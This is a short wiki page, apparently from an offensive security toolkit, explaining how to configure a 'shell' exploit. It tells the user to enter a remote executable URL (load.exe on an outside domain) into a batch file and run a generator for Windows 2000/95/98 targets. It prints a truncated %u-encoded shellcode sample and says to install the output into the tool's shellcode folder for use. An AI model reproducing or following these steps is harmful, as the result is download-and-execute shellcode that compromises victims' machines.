-
Notifications
You must be signed in to change notification settings - Fork 11
Setting "Shell" exploits
Munir Njiru edited this page Jul 18, 2014
·
1 revision
This is located in the folder: progs/SHELLCODE_GEN
- Open Payload.bat using notepad and put your http://mth3l3m3nt.com/load.exe (Replace with your url) then close.
- Run beta.bat
- go through the folders 2K-EN-0x77E70000, 95-EN-0xBFF70000, 98-EN-0xBFF70000 and open the text files there will be a shellcode e.g. below: "%u0feb%u8058%u8830%u8140%u6838%u6361%u756b%uebf4%ue805%uffec%uffff%u7861%u8888%ud088%u01dd%u096d%ua464%u8888%u0188%u5ccd%ucd4f%u8874%u7e88%u0337%u74cd%u09ee%uc5b0%ufdd2%u8df4%u88b4%u8888%u9...........................".
- Delete the last full stop after the quote such that you have: "%u0feb%u8058%u8830%u8140%u6838%u6361%u756b%uebf4%ue805%uffec%uffff%u7861%u8888%ud088%u01dd%u096d%ua464%u8888%u0188%u5ccd%ucd4f%u8874%u7e88%u0337%u74cd%u09ee%uc5b0%ufdd2%u8df4%u88b4%u8888%u9..........................."
- Once removed from all points text files, copy these folders into the mod/shell/shellcodes/ for usage.
Decoded and recompiled by the Martian